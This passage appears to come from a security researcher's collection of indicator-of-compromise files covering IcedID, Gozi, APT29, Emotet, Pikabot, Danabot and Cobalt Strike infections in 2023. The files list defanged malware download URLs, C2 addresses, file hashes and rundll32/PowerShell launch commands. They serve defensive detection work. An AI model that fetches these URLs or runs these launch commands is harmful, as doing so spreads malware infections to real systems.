hxxps://firebasestorage.googleapis[.]com/v0/b/hardy-city-377704.appspot.com/o/B3WPGiNEK2%2FSetup_Win_13-02-2023_16-33-16.zip? 19 | alt=media&token=ea9a5843-8216-4883-b45b-d0af1a1d80c8 20 | 21 | ICEDID INSTALLER RETRIEVED GZIP BINARY: 22 | 23 | - 45.61.139[.]138 port 80 - alishabrindeader[.]com - GET / 24 | 25 | ICEDID C2: 26 | 27 | - 192.3.76[.]227 port 443 - treylercompandium[.]com - HTTPS traffic 28 | - 192.3.76[.]227 port 443 - qonavlecher[.]com - HTTPS traffic 29 | 30 | ASSOCIATED MALWARE: 31 | 32 | - SHA256 hash: 3abf775b4cf70b7e0b86288320b3ce39483ea7b4b2073dc14204c2e229c9f6bf 33 | - File size: 820,729 bytes 34 | - File name: Setup_Win_13-02-2023_16-33-16.zip 35 | - File description: Zip archive downloaded from the fake Microsoft Teams page 36 | 37 | - SHA256 hash: 68fcd0ef08f5710071023f45dfcbbd2f03fe02295156b4cbe711e26b38e21c00 38 | - File size: 742,701,568 bytes 39 | - File name: Setup_Win_13-02-2023_16-33-14.exe 40 | - File description: Extracted from the above zip archive, an inflated 64-bit EXE to install IcedID 41 | 42 | - SHA256 hash: 7eb6e8fdd19fc6b852713c19a879fe5d17e01dc0fec62fa9dec54a6bed1060e7 43 | - File size: 1,286,648 bytes 44 | - File description: gzip binary from alishabrindeader[.]com retrieved by IcedID installer 45 | - File type: gzip compressed data, was "Table.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1760198 46 | 47 | - SHA256 hash: 332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953 48 | - File size: 354,474 bytes 49 | - File location: C:\Users\[username]\AppData\Roaming\ClothOriginal\license.dat 50 | - File description: Data binary used to run persistent IcedID DLL 51 | 52 | - SHA256 hash: 28905b90b90bc7dacf6ccd6c2fadd04db5f164099d837ed065c92cc93c0126c5 53 | - File size: 931,420 bytes 54 | - File location: C:\Users\[username]\AppData\Local\{C7AD9C9E-113F-1954-F746-CE738D27118A}\zeayexta2.dll 55 | - File description: Persistent IcedID DLL (64-bit DLL) 56 | - Run method: rundll32.exe [filename],init --pi="[path to license.dat]" 57 | -------------------------------------------------------------------------------- /2023-02-24-IOCs-for-IcedID-infection-with-BackConnect-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2023-02-24 (FRIDAY): ICEDID (BOKBOT) INFECTION WITH BACKCONNECT TRAFFIC AND COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - This infection was generated using a OneNote file from Tuesday 2023-02-21 (Tuesday) 6 | -- More info at on this wave IcedID at: https://twitter.com/pr0xylife/status/1628155747040210945 7 | - IP for IcedID BackConnect traffic first reported at: https://twitter.com/teamcymru_S2/status/1629186902011138049 8 | - Cobalt Strike activity first reported on 2023-02-04: https://twitter.com/drb_ra/status/1622058257823965189 9 | 10 | INFECTION TRAFFIC: 11 | 12 | ICEDID INSTALLER RETRIEVES GZIP BINARY: 13 | 14 | - 193.149.129[.]131 port 80 - aerilaponawki[.]com - GET / HTTP/1.1 15 | 16 | ICEDID C2 TRAFFIC: 17 | 18 | - 5.255.102[.]167 port 443 - klindriverfor[.]com - HTTPS traffic 19 | - 192.236.163[.]96 port 443 - qoipaboni[.]com - HTTPS traffic 20 | - 192.236.163[.]96 port 443 - yelsopotre[.]com - HTTPS traffic 21 | 22 | ICEDID BACKCONNECT TRAFFIC: 23 | 24 | - 135.148.217[.]85 port 8080 - TCP traffic for IcedID BackConnect 25 | 26 | COBALT STRIKE ACTIVITY: 27 | 28 | - Domain: aspnetcenter[.]com - Registered on 2023-02-02 29 | - First reported as Cobalt Strike on 2023-02-04: https://twitter.com/drb_ra/status/1622058257823965189 30 | - Domain also seen on other IP addresses: https://twitter.com/search?q=%40drb_ra%20aspnetcenter&f=live 31 | 32 | - 23.227.203[.]70 port 80 - aspnetcenter[.]com - GET /aspnetsystem HTTP/1.1 33 | - 23.227.203[.]70 port 80 - aspnetcenter[.]com - GET /da.html?close=false HTTP/1.1 34 | - 23.227.203[.]70 port 80 - aspnetcenter[.]com - POST /mobile-ipad-home HTTP/1.1 (text/plain) 35 | 36 | ASSOCIATED MALWARE: 37 | 38 | - SHA256 hash: 1ab812f7d829444dc703eeb02ea0a955ec839d5e2a9b619d44ac09a91135cad1 39 | - File size: 418,906 bytes 40 | - File type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows 41 | - File description: 64-bit DLL installer for IcedID 42 | - Run method: rundll32.exe [filename],init 43 | - Sample: https://bazaar.abuse.ch/sample/1ab812f7d829444dc703eeb02ea0a955ec839d5e2a9b619d44ac09a91135cad1/ 44 | 45 | - SHA256 hash: 8518d86b514edfb1ff301d6526e4fbbc0d65aec52442dc108e0797a34c334879 46 | - File size: 276,992 bytes 47 | - File type: PE32+ executable (DLL) (GUI) x86-64 system file, for MS Windows 48 | - File description: 64-bit DLL for Cobalt Strike 49 | - Run method: unknown 50 | - Sample: https://bazaar.abuse.ch/sample/8518d86b514edfb1ff301d6526e4fbbc0d65aec52442dc108e0797a34c334879 51 | -------------------------------------------------------------------------------- /2023-03-06-IOCs-for-Gozi-infection.txt: -------------------------------------------------------------------------------- 1 | 2023-03-06 (MONDAY): GOZI (ISFB/URSNIF) FROM MALSPAM TARGETING ITALY 2 | 3 | NOTES: 4 | 5 | - This activity was first tweeted on Monday 2023-03-06 by the Italy CERT at @AgidCert 6 | - As of Thursday 2023-03-09, many URLs and servers hosting the associted malware were apparently still on-line. 7 | 8 | REFERENCES: 9 | 10 | - https://twitter.com/AgidCert/status/1632686769203302402 11 | - https://twitter.com/JAMESWT_MHT/status/1632693485739429889 12 | 13 | INFECTION CHAIN: 14 | 15 | - Email --> link --> downloaded zip --> double-click extracted .url file --> SMB traffic for Gozi EXE --> Gozi infection 16 | 17 | MALWARE FROM AN INFECTION TEST RUN ON 2023-03-06: 18 | 19 | - SHA256 hash: 57befac41319e7e1fc9d6cd5637240fa766bdbc562d7720bb04beee36113ae10 20 | - File size: 474 bytes 21 | - File location: hxxps://nhatheptienchebinhduong[.]com/mise/Normativa.zip 22 | - File description: Zip archive from link in email 23 | 24 | - SHA256 hash: c59dc482b521b021813681f99a8570aa0f57a30bcf42d48667eb09ae635cc9a1 25 | - File size: 189 bytes 26 | - File name Normativa.url 27 | - File description: URL file extracted from the above zip archive 28 | 29 | - SHA256 hash: fc3e7ff40a45bccd83617ea952eccdfc93301c6673cce8de33b4bf924b8957d9 30 | - File size: 318,976 bytes 31 | - File location: file://46.8.19[.]163/mise/server.exe 32 | - File description: Windows EXE for Gozi/ISFB/Ursnif retrieved by the above .url file 33 | 34 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 35 | 36 | URL FOR INITIAL ZIP DOWNLOAD: 37 | 38 | - 103.138.88[.]52 port 80 - nhatheptienchebinhduong[.]com - GET /mise/Normativa.zip 39 | - Note: The URL for this is HTTPS, but it can also be retrieved over unencrypted HTTP traffic. 40 | 41 | SMB TRAFFIC FOR GOZI (ISFB/URSNIF) EXE: 42 | 43 | - 46.8.19[.]163 port 445 - SMB traffic - file://46.8.19[.]163/mise/server.exe 44 | 45 | GOZI (ISFB/URSNIF) C2: 46 | 47 | - 62.173.140[.]103 port 80 - 62.173.140[.]103 - GET /drew/[base64 string with underscores and backslashes].jlk 48 | - 62.173.138[.]138 port 80 - 62.173.138[.]138 - GET /drew/[base64 string with underscores and backslashes].gif 49 | - 62.173.149[.]243 port 80 - 62.173.149[.]243 - GET /stilak32.rar 50 | - 62.173.149[.]243 port 80 - 62.173.149[.]243 - GET /stilak64.rar 51 | - 62.173.138[.]138 port 80 - 62.173.138[.]138 - POST /drew/[base64 string with underscores and backslashes].bmp 52 | - 62.173.149[.]243 port 80 - 62.173.149[.]243 - GET /cook32.rar 53 | - 62.173.149[.]243 port 80 - 62.173.149[.]243 - GET /cook64.rar 54 | - 62.173.140[.]94 port 80 - 62.173.140[.]94 - GET /drew/[base64 string with underscores and backslashes].gif 55 | - 31.41.44[.]60 port 80 - 31.41.44[.]60 - GET /drew/[base64 string with underscores and backslashes].gif 56 | - 46.8.19[.]233 port 80 - 46.8.19[.]233 - GET /drew/[base64 string with underscores and backslashes].gif 57 | - 5.44.45[.]201 port 80 - 5.44.45[.]201 - GET /drew/[base64 string with underscores and backslashes].gif 58 | - 89.116.236[.]41 port 80 - 89.116.236[.]41 - GET /drew/[base64 string with underscores and backslashes].gif 59 | - 62.173.140[.]76 port 80 - 62.173.140[.]76 - GET /drew/[base64 string with underscores and backslashes].gif 60 | - 31.41.44[.]49 port 80 - 31.41.44[.]49 - GET /drew/[base64 string with underscores and backslashes].gif 61 | - 46.8.19[.]86 port 80 - 46.8.19[.]86 - GET /drew/[base64 string with underscores and backslashes].gif 62 | - 62.173.140[.]94 port 80 - 62.173.140[.]94 - GET /drew/[base64 string with underscores and backslashes].gif 63 | -------------------------------------------------------------------------------- /2023-03-10-IOCs-for-CloakedUrsa-APT29-Activity.txt: -------------------------------------------------------------------------------- 1 | FEBRUARY 2023: CLOAKED URSA (APT29) PHISHING 2 | 3 | 4 | NOTES: 5 | 6 | - This highlights additional activity originally reported upon by Recorded Future's Insikt Group on 20230127. 7 | - The activity related to SHA256 21a0b617431850a9ea2698515c277cbd95de4e59c493d0d8f194f3808eb16354 was first tweeted on 20230305 by @felixaime 8 | - Cloaked Ursa continues to use compromised WordPress sites to deliver malicious payloads in its phishing operations 9 | 10 | 11 | REFERENCES: 12 | 13 | - https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf 14 | - https://twitter.com/felixaime/status/1632448523995103232 15 | 16 | 17 | INFECTION CHAIN: 18 | 19 | - Email --> link --> HTA file containing obfuscated archive --> open downloaded archive file --> click on masquerading .exe / .lnk file within archive --> 20 | GraphicalNeutrino .dll loads and contacts notion[.]com for C2 & additional payloads 21 | 22 | 23 | COMPROMISED WORDPRESS SITES USED: 24 | signitivelogics[.]com 25 | literaturaelsalvador[.]com 26 | 27 | ----- 28 | 29 | Czech Republic Ministry of Foreign Affairs-Related: 30 | --> URL: hxxps://signitivelogics[.]com/Schedule.html 31 | --> Downloaded Archive: SHA256 56595330e9b7abc1fb1044ca7970693fab47d3191d1d98d7f7b5a12e43e07a0b; Filename: Schedule.zip 32 | --> Legitimate .exe: SHA256 8ca4bf6df28088aa9ce3fc4a226932ae37af74ef54069480b7f4b2efe9402ddc; Filename: Meeting_Info.exe (Legitimate BsSndRpt.exe) 33 | --> Hidden GraphicalNeutrino .dll: SHA256 4d92a4cecb62d237647a20d2cdfd944d5a29c1a14b274d729e9c8ccca1f0b68b; Filename: BugSplatRc64.dll 34 | 35 | ----- 36 | 37 | European Commission-Related Software Instructions: 38 | hxxps://literaturaelsalvador[.]com/Instructions.html 39 | --> Downloaded Archive: SHA256 21a0b617431850a9ea2698515c277cbd95de4e59c493d0d8f194f3808eb16354; Filename: Instructions.iso 40 | --> .lnk File: dffaefaabbcf6da029f927e67e38c0d1e6271bf998040cfd6d8c50a4eff639df; Filename: Instructions.lnk 41 | --> GraphicalNeutrino .dll: SHA256 e957326b2167fa7ccd508cbf531779a28bfce75eb2635ab81826a522979aeb98; Filename: BugSplatRc64.dll 42 | 43 | ----- 44 | 45 | Polish Ministry of Foreign Affairs-Related: 46 | hxxps://literaturaelsalvador[.]com/Schedule.html 47 | --> Downloaded Archive: SHA256 505f1e5aed542e8bfdb0052bbe8d3a2a9b08fc66ae49efbc9d9188a44c3870ed; Filename: Schedule.iso 48 | --> .lnk File: dffaefaabbcf6da029f927e67e38c0d1e6271bf998040cfd6d8c50a4eff639df; Filename: Instructions.lnk 49 | --> GraphicalNeutrino .dll: SHA256 e957326b2167fa7ccd508cbf531779a28bfce75eb2635ab81826a522979aeb98; Filename: BugSplatRc64.dll 50 | 51 | ----- 52 | 53 | BMW Automobile Purchase-Related: 54 | --> URL: hxxps://signitivelogics[.]com/BMW.html 55 | --> Downloaded Archive: SHA256 9c72d80f93ef4d51efbc1c4e29e65cc8af399a1e9463bacc694fb32ea5342771; Filename: Car_info.zip 56 | --> Legitimate .exe: SHA256 8ca4bf6df28088aa9ce3fc4a226932ae37af74ef54069480b7f4b2efe9402ddc; Filename: BMW_sale.exe (Legitimate BsSndRpt.exe) 57 | --> Hidden GraphicalNeutrino .dll: SHA256 3a489ef91058620951cb185ec548b67f2b8d047e6fdb7638645ec092fc89a835; Filename: BugSplatRc64.dll 58 | -------------------------------------------------------------------------------- /2023-03-22-some-IOCs-for-Emotet-E4-activity.txt: -------------------------------------------------------------------------------- 1 | 2023-03-22 (WEDNESDAY): SOME INDICATORS FOR EMOTET EPOCH 4 ACTIVITY 2 | 3 | NOTES: 4 | 5 | - So far, Emotet epoch 4 emails we've seen today have only had OneNote attachments, although recent Emotet malspam has used 6 | either OneNote files or zip attachments with inflated Word documents. 7 | 8 | - Emotet continues using zip archives when retrieving inflated Emotet DLL files. 9 | 10 | INFECTION CHAIN: 11 | 12 | - Email --> OneNote attachment --> embedded VBS file --> retrieve zip archive --> extract and run inflated DLL --> Emotet post-infection activity. 13 | 14 | SENDER INFO FROM HEADERS IN FIVE EPOCH 4 EMAIL EXAMPLES: 15 | 16 | - Received: from smtp.mavorion[.]com ([49.236.215[.]100]) 17 | (Authenticated sender: ghorahi.boa@citizenlifenepal[.]com) 18 | 19 | - Received: from 79.172.205[.]53 (EHLO s33.profitarhely[.]hu) 20 | (envelope-from ) 21 | 22 | - Received: from bg5.exmail.qq[.]com (43.154.197[.]177) 23 | Return-Path: shobhit.pv2@cmec[.]com 24 | 25 | - Received: from vps61595.inmotionhosting[.]com (104.152.110[.]186) 26 | X-Authenticated-Sender: vps61595.inmotionhosting[.]com: msdeveza@pacificfortia[.]com 27 | 28 | - Received: from www.tonan-trading[.]com (120.143.48[.]235) 29 | Return-Path: j.anan@tonan-trading[.]com 30 | 31 | - Note: Information in email headers can be spoofed, so the above header lines might not reflect the true source of the email. 32 | 33 | SHA256 HASHES FOR EMOTET EPOCH 4 ONENOTE DOCUMENTS, FOUR EXAMPLES, ALL 268,004 BYTES: 34 | 35 | - 49b6ecc7fc09944ad7ae6456458cbf0c9c7284ad8e371fcbd791d1e8cd809dee - Electronic form 03.22.2023.one 36 | - 127600f09554e8fd36639ba78bfeefa255f8674e014d3e345732dad82693d804 - W-9 Dt 03.22.2023.one 37 | - 0f358a71775ad9224f77547f23c75333fabcdfa089abf80a68f6703cd4885080 - doc_0322.one 38 | - 4de23bba14b8208a50658e40f77f9dc06cc5a46422bb9ae6fce4655e61893309 - form 03.22.2023 Gmail.one 39 | 40 | EMBEDDED VISUAL BASIC SCRIPT (.VBS) FILE IN ALL THE ABOVE ONENOTE DOCUMENTS: 41 | 42 | - SHA256 hash: 73527befbcc1ec6716003fc875d578c40e3dfe619349ff288008bab33c90e5d2 43 | - File size: 91,841 bytes 44 | - File name: press to unblock document.vbs 45 | 46 | 7 URLS GENERATED BY ABOVE VBS FILE TO RETRIEVE ZIP ARCHIVE: 47 | 48 | - hxxp://erkaradyator.com[.]tr/Areas/1Dg2PeStqNlOjuPP3fu/ 49 | - hxxp://panel.chatzy[.]in/k7daqAXFTBus7mkuwwC/UQ9Y8RRqoOQ9/ 50 | - hxxps://esentai-gourmet[.]kz/404/5oe050kBsHedqng/ 51 | 52 | - hxxp://ardena[.]pro/dqvoakrc/Hh9/ <-- message that site is disabled ** 53 | - hxxp://toiaagrosciences1.hospedagemdesites[.]ws/grupotoia/CPKU5ZE/ <-- Object not found! Error 404 ** 54 | - hxxps://sachininternational[.]com/wp-admin/ILVDnlmIATb8/ <-- 404 Not found ** 55 | - hxxps://suppliercity[.]com[.]mx/wp-content/x0u6wST03y6X49MOq/ <-- URL no encontrada. 404. Ups... ** 56 | 57 | ** No longer working when we tested the URL 58 | 59 | 3 EXAMPLES OF DOWNLOADED ZIP ARCHIVES: 60 | 61 | - 6308ad941dba6d1a8c3612351ec44c4e69604b675ecd955345963318afda9fdf - 993,981 bytes 62 | - 6cd4df371c8e58d963261c0083017d3e79a016dcf619d0ee04fcc90209a289e8 - 1,012,337 bytes 63 | - 92c64767f9e6e0fb2e0d880f835f16b12e21fbc00b2c6cc87c0e6a07bbe0d156 - 974,691 bytes 64 | 65 | INFLATED EMOTET DLL FILES EXTRACTED FROM THE ABOVE ZIP ARCHIVES: 66 | 67 | - 0f3ba94e10c72a31ef11bcf580ddbdabb43b5ed37b84638db1c973a1577c9be3 - 556,727,808 bytes 68 | - c8a777959691f310d36c30f18f10f523be55fe55c86f7d3b556bd31ebb5d6126 - 536,804,864 bytes 69 | - ff3eba9a8324180ea6153844bab8ab3d08dc179f717acfc4ee74248e57cae203 - 575,602,176 bytes 70 | 71 | NOTE: The downloaded zip archives and their inflated DLL content frequently change and are usually different for each download. 72 | -------------------------------------------------------------------------------- /2023-05-22-IOCs-for-Pikabot-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2023-05-22 (MONDAY): PIKABOT INFECTION WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> link --> downloaded .js file --> retrieves Pikabot DLL --> Pikabot C2 --> Cobalt Strike 6 | 7 | NOTES: 8 | 9 | - The .js file and Pikabot DLL are different file hashes every time. 10 | - The URL for the Pikabot DLL has a different character string after the last "/" from each .js file. 11 | - Pikabot information provided here is specific for this infection. 12 | - The Cobalt Strike server seen during this infection used a domain originally registered on 2023-04-05. 13 | 14 | DOMAIN HOSTING .JS FILE: 15 | 16 | - alejnr[.]com 17 | - Note: This is a legitimate, but compromised website. For URL details, see the following reference: 18 | --- Reference: https://urlhaus.abuse.ch/browse.php?search=alejnr 19 | 20 | PIKABOT DLL DOWNLOAD: 21 | 22 | - hxxp://176.124.198[.]213/Fs8Py/eKTYt3dRbEXw 23 | 24 | PIKABOT C2: 25 | 26 | - 129.213.54.49 port 2078 - HTTPS traffic (self-signed cert date: 2023-03-23) 27 | 28 | COBALT STRIKE TRAFFIC: 29 | 30 | - 46.30.190[.]12:443 - dopubopigo[.]us - HTTPS traffic (Domain resgistered: 2023-04-05, Sectigo cert date: 2023-04-06) 31 | 32 | DOWNLOADED .JS FILE: 33 | 34 | - SHA256 hash: 461e17a3fd2cb632fc31c85d625c289550daf359a6565c9dd7d08cf0b6914c9f 35 | - File size: 130,584 bytes 36 | - Downloaded file name: Iuksxy.js 37 | - When run, file was copied to: C:\ProgramData\Firnismalerei.js 38 | - Sample available at: https://bazaar.abuse.ch/sample/461e17a3fd2cb632fc31c85d625c289550daf359a6565c9dd7d08cf0b6914c9f/ 39 | 40 | PIKABOT DLL: 41 | 42 | - SHA256 hash: ff99eaa3851bee30db140846f083a5f8064eaad2707ab5a6d8a0b6d4dd9b8c61 43 | - File size: 543,048 bytes 44 | - Downloaded from: hxxp://176.124.198[.]213/Fs8Py/eKTYt3dRbEXw 45 | - Initial saved location: C:\ProgramData\Undermines.Personificative 46 | - Final saved location: C:\Users\[username]\AppData\Roaming\Microsoft\CostumicEuxineUndernatural\postventralImpetuosityJunglewood.dll 47 | - Run method: rundll32.exe [filename],vips 48 | - Sample available at: https://bazaar.abuse.ch/sample/ff99eaa3851bee30db140846f083a5f8064eaad2707ab5a6d8a0b6d4dd9b8c61/ 49 | -------------------------------------------------------------------------------- /2023-07-12-IOCs-from-Gozi-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2023-07-12 (WEDNESDAY): GOZI/ISFB INFECTION WITH COBALT STRIKE 2 | 3 | ASSOCIATED MALWARE: 4 | 5 | - SHA256 hash: 620bc1e016887d7761907a85d49870a832b70e0340f599b472bec0a11b7b663a 6 | - File size: 613,888 bytes 7 | - File type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows 8 | - File description: 32-bit Windows DLL for Gozi/ISFB, Botnet 2100, build 250259 9 | - Run method: regsvr32.exe [filename] 10 | 11 | - SHA256 hash: 540dfbef1bc65462cac88ad24a6d5cea867d9b392e9f8ae66c20ee49f4002793 12 | - File size: 1,578,496 bytes 13 | - File type: PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows 14 | - File location: hxxps://softwaredw[.]com/64HTTPS.dll 15 | - Saved location: C:\Windows\Tasks\x11ogwin.dll 16 | - File description: 64-bit Windows DLL for Cobalt Strike stager 17 | - Run method: start-process rundll32.exe -ArgumentList '/s c:\windows\tasks\x11ogwin.dll,recurring' 18 | 19 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 20 | 21 | GOZI/ISFB C2 TRAFFIC: 22 | 23 | - 151.248.117[.]244 port 80 - diwdjndsfnj[.]ru - GET /uploaded/[long base64 string with backslashes and underscores].pct 24 | - 151.248.117[.]244 port 80 - diwdjndsfnj[.]ru - POST /uploaded/[long base64 string with backslashes and underscores].dib 25 | - 151.248.117[.]244 port 80 - diwdjndsfnj[.]ru - GET /uploaded/[long base64 string with backslashes and underscores].pmg 26 | - 151.248.117[.]244 port 80 - iwqdndomdn[.]su - GET /uploaded/[long base64 string with backslashes and underscores].pmg 27 | - 151.248.117[.]244 port 80 - iwqdndomdn[.]su - POST /uploaded/[long base64 string with backslashes and underscores].dib 28 | 29 | GOZI/ISFB MODULES (ENCRYPTED DATA BINARIES): 30 | 31 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /vnc32.rar 32 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /vnc64.rar 33 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /stilak32.rar 34 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /stilak64.rar 35 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /cook32.rar 36 | - 91.199.147[.]95 port 80 - 91.199.147[.]95 - GET /cook64.rar 37 | 38 | TRAFFIC CAUSED BY VNC MODULE: 39 | 40 | - 188.127.224[.]25 port 9955 - TCP traffic 41 | 42 | ENCRYPTED DATA BINARY FOR COBALT STRIKE STAGER: 43 | 44 | - 194.58.102[.]187 port 80 - 194.58.102[.]187 - GET /01/64HTTPS.zip 45 | 46 | DLL FOR COBALT STRIKE STAGER: 47 | 48 | - 193.149.176[.]60 port 443 - softwaredw[.]com - GET /softwaredw.com/64HTTPS.dll 49 | 50 | COBALT STRIKE C2: 51 | 52 | - 170.130.55[.]162 port 443 - iamupdate[.]com - HTTPS traffic, TLSv1.2, Let's Encrypt certificate, not valid before 2023-07-03 -------------------------------------------------------------------------------- /2023-08-03-IOCs-for-malicious-ad-to-Danabot.txt: -------------------------------------------------------------------------------- 1 | 2023-08-03 (THURSDAY): GOOGLE AD FOR FAKE TURBOTAX SITE LEADS TO DANABOT 2 | 3 | EXAMPLE OF MALICIOUS GOOGLE AD LINK: 4 | 5 | - hxxps://www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwi3iM26yMGAAxWFSn8AHToEAdcYABAAGgJvYQ& 6 | ohost=www.google[.]com&cid=CAASJuRoJrLTd0-uxMSQqluzExwoj-kYxuPKYg55eLkWJNVBLsK7CvqE& 7 | sig=AOD64_13HHlF_oT7_egNvSbui3zWsKM5MQ&q&adurl&ved=2ahUKEwiNvMK6yMGAAxUXlmoFHQBuDeEQ0Qx6BAgOEAE 8 | 9 | EXAMPLE OF URL FROM THE GOOGLE AD LINK: 10 | 11 | - hxxps://bildhm[.]com/?gclid=EAIaIQobChMIt4jNusjBgAMVhUp_AB06BAHXEAMYASAAEgJcifD_BwE 12 | 13 | PAGE FROM THE ABOVE URL CONTAINS IFRAME TO DISPLAY: 14 | 15 | - hxxp://tunbontaxes[.]com/turbotax/ 16 | 17 | LINK TO DOWNLOAD FAKE TURBOTAX INSTALLER: 18 | 19 | - hxxp://tunbontaxes[.]com/turbotax/download.php 20 | 21 | ABOVE URL REDIRECTS TO: 22 | 23 | - File location: hxxps://intrigi[.]net/TurboTax-x64.msix 24 | 25 | FAKE TURBOTAX INSTALLER: 26 | 27 | - SHA256: 253dd4a13beaf2d0eaa1a48b7a33c8c1440b3921408f83400d46618002337350 28 | - File size: 77,628,839 bytes 29 | - File location: hxxps://intrigi[.]net/TurboTax-x64.msix 30 | - File type: Zip archive data, at least v4.5 to extract, compression method=deflate 31 | - File description: malicoius .msix file 32 | 33 | EXAMPLE OF URL DOWNLOADING ENCODED BINARY: 34 | 35 | - hxxps://countingstatistic[.]com/d8uuw6/index/c1/?servername=msi&arp=2&domain=WORKGROUP& 36 | hostname=DESKTOP-1A2B3C4 37 | 38 | NOTE: 39 | 40 | - The above URL returned an encoded binary saved to C:\Users\[username]\code9.exe.enc 41 | - It was decoded using an obfuscated python script and pyarmor. 42 | 43 | DECODED PAYLOAD FROM THE ABOVE INSTALLER: 44 | 45 | - SHA256: 04c0a4f3b5f787a0c9fa8f6d8ef19e01097185dd1f2ba40ae4bbbeca9c3a1c72 46 | - File size: 4,384,328 bytes 47 | - File location: C:\Users\[username]\code9.exe 48 | - File type: PE32 executable (GUI) Intel 80386, for MS Windows 49 | - File description: Installer for Danabot 50 | - Analysis: https://app.any.run/tasks/f1dc5fa9-c05f-4c57-b3db-48742c68a361# 51 | - Analysis: https://www.joesandbox.com/analysis/1285430 52 | - Analysis: https://tria.ge/230803-w7garaff23 53 | 54 | TRAFFIC GENERATED BY RUNNING THE ABOVE INSTALLER: 55 | 56 | - hxxps://www.4sync[.]com/web/directDownload/KFtZysVO/4jBKM7R0.baa89a7b43a7b73227f22ae561718f7f 57 | 58 | - https://dc534.4sync[.]com/download/KFtZysVO/1499612425.png?dsid=4jBKM7R0. 59 | baa89a7b43a7b73227f22ae561718f7f&sbsr=b3624cf6a6f288cbabef739faf3818f7aec& 60 | bip=MTg1LjE5Mi4xNi4xOA&lgfp=40 61 | 62 | DANABOT DLL: 63 | 64 | - SHA256: 2b7a1fa4044dbb578015ffd8957ecf6300259c0c7bf4ba937aee9ab346193660 65 | - File size: 4,384,328 bytes 66 | - File location: C:\Users\[username]\AppData\Local\Temp\Qaaqwspeiauiey.dll 67 | - File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 68 | - File description: Malicious DLL for Danabot 69 | - Run method: rundll32 [filename],start 70 | 71 | DANABOT C2 TRAFFIC: 72 | 73 | - 45.61.169[.]91 port 443 - encoded/encrypted TCP traffic 74 | - 167.88.166[.]193 port 443 - encoded/encrypted TCP traffic 75 | -------------------------------------------------------------------------------- /2023-08-09-IOCs-from-IcedID-infection.txt: -------------------------------------------------------------------------------- 1 | 2023-08-09 (WEDNESDAY): TROJANIZED WEBEX INSTALLER --> ICEDID --> BACKCONNECT TRAFFIC WITH KEYHOLE VNC 2 | 3 | INFECTION CHAIN: 4 | 5 | - Possibly malicious ad in search results to fake Webex page --> .msix installer package --> .ps1 script --> IcedID infection 6 | 7 | NOTES: 8 | 9 | - Trojanized Webex installer was submitted to VirusTotal on Tuesday 2023-08-08 10 | 11 | ASSOCIATED MALWARE: 12 | 13 | - SHA256 hash: b44857ba393ee929625a2328ded86d1c6d3d63119fb16952c35d35a9711121f4 14 | - File size: 32,166,635 bytes 15 | - File name: Webex-x64.msix 16 | - File type: Zip archive data, at least v4.5 to extract, compression method=deflate 17 | - Latest contents modification: 2023-08-07 at 00:49 UTC 18 | - File description: Trojanized installer package for Webex that also installs IcedID malware 19 | 20 | - SHA256 hash: 5ba6fbbfebbc31b41ecca7e2669b1dda41839a571b672d6ac430b291974a03a5 21 | - File size: 1,345 bytes 22 | - File name: NEW_User0_v2.ps1 23 | - File type: ASCII text, with CRLF line terminators 24 | - File description: Contained in above .msix package, PowerShell script to retreive and run IcedID installer 25 | 26 | - SHA256 hash: e1d2c95eda751901a4bdae7ba381b85f5d7965b05afe245b5cbaccce9ecfb0bc 27 | - File size: 196,984 bytes 28 | - File location: hxxps://associazionedignita[.]it/wp-content/uploads/2023/06/r.dll 29 | - File location: C:\Users\[username]\AppData\Roaming\z.dll 30 | - File type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows 31 | - File description: 64-bit Installer DLL for IcedID 32 | - Run method: rundll32.exe [filename], vcab /k chokopai723 33 | - Note: The PowerShell script appends 750 MB to 950 MB of null bytes to the file when saved to disk. 34 | This results in an inflated DLL with a different file size/hash saved to disk for each infection. 35 | 36 | - SHA256 hash: e6d487e341ad86db6723895ede248c6d356b9b6471b43cd789bcc27ca06945fc 37 | - File size: 552,212 bytes 38 | - File location: hxxp://podiumstrtss[.]com/ 39 | - File type: gzip compressed data, was "Light.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3601146 40 | - File description: Gzip binary retrieved by above IcedID installer 41 | 42 | - SHA256 hash: 332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953 43 | - File size: 354,474 bytes 44 | - File location: C:\Users\[username]\AppData\Roaming\NationUniform\license.dat 45 | - File type: data 46 | - File description: data binary needed to run persistent IcedID DLL 47 | 48 | - SHA256 hash: c4ea6aec4f71e0a39407bdf76f00d3e6bcce95f01bef35fada84717b3cf6dc1c 49 | - File size: 196,984 bytes 50 | - File location: C:\Users\[username]\AppData\Roaming\[username]\udagqoaw3.dll 51 | - File type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows 52 | - File description: 64-bit persistent DLL for IcedID 53 | - Run method: rundll32.exe [filename],init --bifa="[path to license.dat]" 54 | 55 | TRAFFIC GENERATED BY .PS1 SCRIPT: 56 | 57 | - 81.177.140[.]194 port 443 - hxxps://9sta9rt4[.]store/?status=start&av= 58 | - 77.111.240[.]213 port 443 - hxxps://associazionedignita[.]it/wp-content/uploads/2023/06/r.dll 59 | - 81.177.140[.]194 port 443 - hxxp://9sta9rt4[.]store/?status=install 60 | 61 | ICEDID 